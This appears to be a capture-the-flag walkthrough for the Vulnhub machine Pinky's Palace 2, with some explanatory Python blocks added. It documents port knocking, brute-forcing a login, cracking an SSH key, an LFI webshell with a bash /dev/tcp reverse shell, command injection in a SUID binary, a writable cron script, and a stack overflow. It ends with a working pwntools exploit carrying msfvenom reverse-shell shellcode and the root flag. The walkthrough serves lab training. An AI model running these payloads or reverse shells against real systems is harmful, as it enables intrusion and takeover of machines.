[Vulnhub] Pinkys-Palace2 Port-Knocking+ssh_crack+LFI+RE+Cron+RE&BOF


Information Gathering

IP Address       Open Ports
192.168.8.108    TCP: 80, 4655, 7654, 31337

$ nmap -p- 192.168.8.108 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
4655/tcp  filtered unknown
7654/tcp  filtered unknown
31337/tcp filtered Elite

Directory Scanning

$ curl http://192.168.8.108 -I

image.png

# echo '192.168.8.108 pinkydb'>>/etc/hosts

image-1.png

image-2.png

pinky1337

$ gobuster dir -u "http://pinkydb" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

image-3.png

image-4.png

pinkydb

Port Knocking

Ports 4655, 7654 and 31337 show as filtered, so they sit behind a knock daemon. Knock the sequence 7000, 666, 8890 (-d 300 is the delay in milliseconds between knocks) and rescan:

$ knock 192.168.8.108 7000 666 8890 -d 300 -v

image-5.png
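The knock above is nothing more than three connection attempts in a fixed order with a pause between them; the daemon watches for the SYNs, so each attempt is expected to fail. The following is an added example (not part of the original writeup) that reimplements that behaviour in Python and then checks whether the protected port has opened. Host, ports and delay are taken from the knock command on the page; the `connect` hook is an assumption added so the sequence can be exercised without a network.

```python
import socket
import time


def knock(host, ports, delay=0.3, timeout=0.5, connect=None):
    """Send one TCP knock per port, in order, sleeping `delay` seconds between them.

    A knock is just a connect() attempt: the knock daemon sees the SYN, so the
    connection is expected to fail (the knock ports are closed or filtered).
    `connect(host, port)` can be swapped for a fake in tests; the default opens
    a real socket and swallows the expected error.
    """
    if connect is None:
        def connect(h, p):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            try:
                s.connect((h, p))
            except OSError:
                pass  # expected: nothing is listening on a knock port
            finally:
                s.close()
    sent = []
    for p in ports:
        connect(host, p)
        sent.append(p)
        time.sleep(delay)
    return sent


def port_is_open(host, port, timeout=1.0):
    """True if `port` on `host` now accepts a TCP connection (i.e. the knock worked)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return True
    except OSError:
        return False
    finally:
        s.close()


if __name__ == "__main__":
    target = "192.168.8.108"          # from the writeup
    knock(target, [7000, 666, 8890], delay=0.3)   # same sequence as `knock ... -d 300`
    for p in (4655, 7654, 31337):
        print("%s:%d open=%s" % (target, p, port_is_open(target, p)))
```

The order matters: most knock daemons reset their state machine on an out-of-sequence hit, which is also why a delay between knocks is used, so the packets do not arrive reordered.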

$ nmap -p- 192.168.8.108 --min-rate 1000 -sC -sV

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
4655/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
|   2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
|   256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_  256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp  open  http    nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Pinkys Database
31337/tcp open  Elite?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|   GetRequest:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HTTP/1.0
|   HTTPOptions:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / HTTP/1.0
|   Help:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HELP
|   RTSPRequest:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / RTSP/1.0
|   SIPOptions:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|_    Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.92%I=7%D=7/12%Time=66911572%P=x86_64-pc-linux-gnu%r(N
SF:ULL,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20i
SF:s\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.
SF:\n=>\x20\0")%r(GetRequest,6B,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\
SF:x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\
SF:x20Pinky's\x20Palace\.\n=>\x20\0GET\x20/\x20HTTP/1\.0\r\n\r\n")%r(SIPOp
SF:tions,138,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x
SF:20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palac
SF:e\.\n=>\x20\0OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20n
SF:m;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r
SF:\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\
SF:nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicat
SF:ion/sdp\r\n\r\n")%r(GenericLines,5D,"\[\+\]\x20Welcome\x20to\x20The\x20
SF:Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n
SF:\0into\x20Pinky's\x20Palace\.\n=>\x20\0\r\n\r\n")%r(HTTPOptions,6F,"\[\
SF:+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x
SF:20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0O
SF:PTIONS\x20/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,6F,"\[\+\]\x20Welcome\
SF:x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20o
SF:ur\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0OPTIONS\x20/\x20
SF:RTSP/1\.0\r\n\r\n")%r(RPCCheck,5A,"\[\+\]\x20Welcome\x20to\x20The\x20Da
SF:emon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0
SF:into\x20Pinky's\x20Palace\.\n=>\x20\0\x80")%r(DNSVersionBindReqTCP,59,"
SF:\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soo
SF:n\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20
SF:\0")%r(DNSStatusRequestTCP,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon
SF:\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into
SF:\x20Pinky's\x20Palace\.\n=>\x20\0")%r(Help,5F,"\[\+\]\x20Welcome\x20to\
SF:x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20
SF:backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0HELP\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://pinkydb:7654/login.php

image-6.png

image-7.png

Candidate usernames (username.txt):

admin
pinky
pinky1337

$ cewl pinkydb > password.txt

$ hydra -L username.txt -P password.txt pinkydb -s 7654 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid Username or Password"

image-8.png

username:pinky
password:Passione

Cracking the SSH key passphrase with ssh2john

image-9.png

$ curl http://pinkydb:7654/credentialsdir1425364865/id_rsa

image-10.png

$ ssh2john ./id_rsa > crack.txt
$ john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

image-11.png

image-12.png

password:secretz101

OpenSSH 7.4 is affected by username enumeration (CVE-2018-15473), so valid users can be confirmed before trying the key (ssh_u.py is the enumeration script used here):

$ python3 ssh_u.py 192.168.8.108 -p 4655 -w /usr/share/wordlists/rockyou.txt

image-13.png

$ ssh -i id_rsa stefano@192.168.8.108 -p 4655

image-14.png

image-15.png

image-16.png

image-17.png

Privilege escalation: lateral move to www-data

Write a one-line PHP webshell (here /home/stefano/tools/1.php) and include it through the file-inclusion parameter 1337 of pageegap.php on port 7654; the cmd parameter carries a bash reverse shell back to 192.168.8.107:10032:

http://pinkydb:7654/pageegap.php?cmd=%2fbin%2fbash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.8.107%2f10032+0%3e%261%27&1337=/home/stefano/tools/1.php

image-18.png

Privilege escalation: reversing qsub, lateral move to demon

$ cd /home/stefano/tools

www-data@Pinkys-Palace:/home/stefano/tools$ cat qsub|nc 192.168.8.107 10034

image-19.png

The binary reads the TERM environment variable and uses it as the password.

image-20.png

Following the send function: the argument we pass is concatenated onto /bin/echo and run through the shell, so shell metacharacters in the argument are interpreted as extra commands.

image-22.png

image-21.png

$ ./qsub ";/bin/sh;1"

password:xterm-256color

image-23.png

image-24.png

image-25.png
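The qsub flaw is the classic "argument pasted into a shell command line" bug: the check against $TERM is a speed bump, and the `;` in `";/bin/sh;1"` ends the echo command and starts a new one. The block below is an added example, not the qsub binary's code; it models the logic the reversing above describes (TERM as password, then `/bin/echo <arg>` through the shell) as a Python function, next to the fixed version that passes argv as a list so nothing is ever parsed by /bin/sh. The exact structure of the real binary is an assumption.

```python
import os
import subprocess


def qsub_vulnerable(arg, password, env=None):
    """Model of qsub as described on the page (assumption: details of the real
    binary may differ): compare `password` with $TERM, then run
    system("/bin/echo " + arg). The string is parsed by /bin/sh -c, so ';', '|',
    '$(...)' etc. inside `arg` become additional commands."""
    env = os.environ if env is None else env
    if password != env.get("TERM"):
        return None                      # wrong password: nothing executed
    out = subprocess.run("/bin/echo " + arg, shell=True,
                         capture_output=True, text=True)
    return out.stdout


def qsub_fixed(arg, password, env=None):
    """Same behaviour with the shell removed: argv is passed as a list, so
    metacharacters in `arg` reach /bin/echo as literal text."""
    env = os.environ if env is None else env
    if password != env.get("TERM"):
        return None
    out = subprocess.run(["/bin/echo", arg], capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    env = {"TERM": "xterm-256color"}     # the value that served as the password
    # ';id;1' mirrors the page's ';/bin/sh;1' with a command that does not block
    print("vulnerable:", repr(qsub_vulnerable(";id;1", "xterm-256color", env)))
    print("fixed:     ", repr(qsub_fixed(";id;1", "xterm-256color", env)))
```

With the vulnerable version the output contains the result of `id` (and a "1: not found" error on stderr from the trailing `1`); with the fixed version `/bin/echo` simply prints the literal string `;id;1`. On a SUID binary the difference is a shell as the file owner.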

pspy32 confirms that backup.sh is indeed run by a cron job:

image-26.png

$ vi /usr/local/bin/backup.sh

image-27.png

Wait about a minute for the job to fire.

image-28.png
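What makes backup.sh exploitable is not the cron entry itself but the fact that a lower-privileged user can write the script a more privileged account executes. The block below is an added example (not from the writeup) of the check a practitioner runs after pspy points at a job: parse /etc/crontab-style lines and report every job whose script is writable by the current user, including scripts launched through an interpreter such as `/bin/bash /path/x.sh`. The crontab text in `__main__` is constructed for illustration and the `writable` hook exists so the logic can be tested without touching the real filesystem.

```python
import os
import re
import shlex

# /etc/crontab and /etc/cron.d format: m h dom mon dow user command
_CRON_RE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_crontab(text):
    """Return (user, command) for each job line, skipping comments, blank
    lines and VAR=value assignments (SHELL=, PATH=, ...)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = _CRON_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def writable_cron_scripts(text, writable=None):
    """Return (user, path) for every job that runs a file the current user can
    write. Every absolute-path token of the command is checked, so
    '/bin/bash /usr/local/bin/backup.sh' is caught via backup.sh.
    `writable(path)` defaults to a real os.access() check."""
    if writable is None:
        def writable(p):
            return os.path.isfile(p) and os.access(p, os.W_OK)
    found = []
    for user, cmd in parse_crontab(text):
        try:
            argv = shlex.split(cmd)
        except ValueError:
            continue                      # unbalanced quotes: not a plain script
        for tok in argv:
            if tok.startswith("/") and writable(tok):
                found.append((user, tok))
                break
    return found


if __name__ == "__main__":
    # constructed sample, modelled on the job found on the box
    sample = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        "*/1 * * * * demon /usr/local/bin/backup.sh\n"
        "0 3 * * * root /bin/bash /opt/rotate.sh\n"
    )
    for user, path in writable_cron_scripts(sample):
        print("%s runs %s and you can write it" % (user, path))
```

Run with the real file (`writable_cron_scripts(open("/etc/crontab").read())`) from the foothold shell; any hit is a direct path to that user, exactly as editing backup.sh above led to demon.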

SSH in as demon the same way, by dropping a public key into authorized_keys (note that > replaces any existing authorized_keys; use >> to append instead):

$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOAuKxlopDqsLWIAFeZFEOiSBz9K/go+OybYs5gwGEBE maptnh@maptnh'>authorized_keys

$ ssh -i ~/.ssh/id_ed25519 demon@192.168.8.108 -p 4655

image-29.png

Privilege escalation: reversing panel, root via BOF

demon@Pinkys-Palace:/daemon$ cat panel | nc 192.168.8.107 10035

image-30.png

This is clearly a socket server listening on port 31337.

$ ps aux | grep panel

image-31.png

And root is the user running this program on port 31337, so a working overflow yields a root shell.

image-32.png

image-33.png

$ gdb -q ./panel

image-35.png

If the process hangs and keeps the port occupied, kill it with:

pkill panel

gdb-peda$ pattern_create 1000

image-36.png

gdb-peda$ run

image-34.png

Determine the offset to the saved return address:

$ echo -e 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x' |nc 127.0.0.1 31337

image-44.png

gdb-peda$ pattern_offset jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAAT

image-45.png

Further confirmation gives an offset of 120 bytes, so there is room for up to 120 bytes of shellcode in the buffer before the saved return address.

gdb-peda$ jmpcall

image-43.png

jmpcall finds a call rsp gadget. Its address has only three significant bytes (the upper bytes are NUL), which is fine because the return address is the last thing in the payload; in little-endian form it becomes:
0x400cfb : call rsp

\xfb\x0c\x40\x00
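The offset-finding step above and the payload layout that follows are mechanical enough to script. The block below is an added example, not code from the writeup: it generates a Metasploit/pwntools-style cyclic pattern, locates an offset from either the bytes seen in the crash or the raw register value, and assembles NOP sled + shellcode + return address. Note that gdb-peda's pattern uses a different character set from the one generated here, so the offset for the exact string shown on the page must be computed with peda itself; the 120-byte offset and the 0x400cfb gadget in the usage are the page's values.

```python
import itertools
import string


def pattern_create(length):
    """Metasploit-style cyclic pattern: triples Aa0 Aa1 ... Aa9 Ab0 ... Zz9,
    unique for 20280 bytes, cut to `length` bytes."""
    triples = ("%s%s%s" % t for t in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    out = "".join(itertools.islice(triples, length // 3 + 1))
    return out[:length].encode()


def pattern_offset(pattern, needle):
    """Offset of `needle` inside `pattern`, or -1.

    `needle` may be the bytes/str copied from the crash dump, or the integer
    value of a register (RSP/RIP). An integer is converted to the little-endian
    bytes that landed in the register; trailing NULs are dropped because a
    64-bit return address from the pattern is usually only partly controlled.
    """
    if isinstance(needle, int):
        needle = needle.to_bytes(8, "little").rstrip(b"\x00")
    elif isinstance(needle, str):
        needle = needle.encode()
    return pattern.find(needle)


def build_payload(shellcode, offset, ret_addr, nop=b"\x90"):
    """NOP sled + shellcode filling exactly `offset` bytes, then the 8-byte
    little-endian return address that overwrites the saved RIP."""
    if len(shellcode) > offset:
        raise ValueError("shellcode is %d bytes but only %d fit before RIP"
                         % (len(shellcode), offset))
    sled = nop * (offset - len(shellcode))
    return sled + shellcode + ret_addr.to_bytes(8, "little")


if __name__ == "__main__":
    pat = pattern_create(1000)                   # like gdb-peda's pattern_create 1000
    print(pat[:40])
    # pretend the crash showed RSP pointing at 'a8Aa9Ab0'
    print("offset:", pattern_offset(pat, 0x3062413961413861))
    # layout used in the exploit: 120 bytes to RIP, call rsp gadget at 0x400cfb
    demo = build_payload(b"\xcc" * 100, 120, 0x400cfb)
    print(len(demo), demo[120:])
```

When shellcode is shorter than the offset the sled goes in front of it, so execution entering anywhere in the buffer slides into the payload; the return address is always the last 8 bytes, which is why the NUL-padded gadget address does not truncate anything.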

$ msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=192.168.8.107 LPORT=10035 -b '\x00' -f python

image-46.png

#!/usr/bin/python3
from pwn import *
import sys

# msfvenom linux/x64/shell_reverse_tcp (LHOST=192.168.8.107, LPORT=10035),
# encoded to avoid NUL bytes. It is exactly 120 bytes, so it fills the buffer
# right up to the saved return address found with pattern_offset.
buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\xd3\xd9\x2d\x43\xb0\xa3\x04"
buf += b"\x5f\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\xb9\xf0\x75\xda\xda\xa1\x5b\x35\xd2\x87\x22\x46\xf8"
buf += b"\x34\x4c\xe6\xd1\xd9\x0a\x70\x70\x0b\x0c\x34\x82\x91"
buf += b"\xa4\xa5\xda\xb3\x5e\x35\xf9\x81\x22\x46\xda\xa0\x5a"
buf += b"\x17\x2c\x17\x47\x62\xe8\xac\x01\x2a\x25\xb3\x16\x1b"
buf += b"\x29\xeb\xbf\x70\xb1\xb0\x43\x6c\xc3\xcb\x04\x0c\x9b"
buf += b"\x50\xca\x11\xe7\xeb\x8d\xb9\xdc\xdc\x2d\x43\xb0\xa3"
buf += b"\x04\x5f\x90"
assert len(buf) == 120          # offset to the saved RIP

ret = p64(0x400cfb)             # call rsp gadget, packed little-endian (trailing NULs are fine at the end)
payload = buf + ret

# usage: python3 exp.py <host>; have a listener ready: nc -lvnp 10035
r = remote(sys.argv[1], 31337)
r.recv()                        # consume the "[+] Welcome to The Daemon [+]" banner
r.send(payload)
print("[Done]")

$ python3 exp.py 127.0.0.1

image-47.png

$ python3 exp.py 192.168.8.108

image-48.png

root@Pinkys-Palace:/root# cat /root/root.txt

image-49.png

2208f787fcc6433b4798d2189af7424d
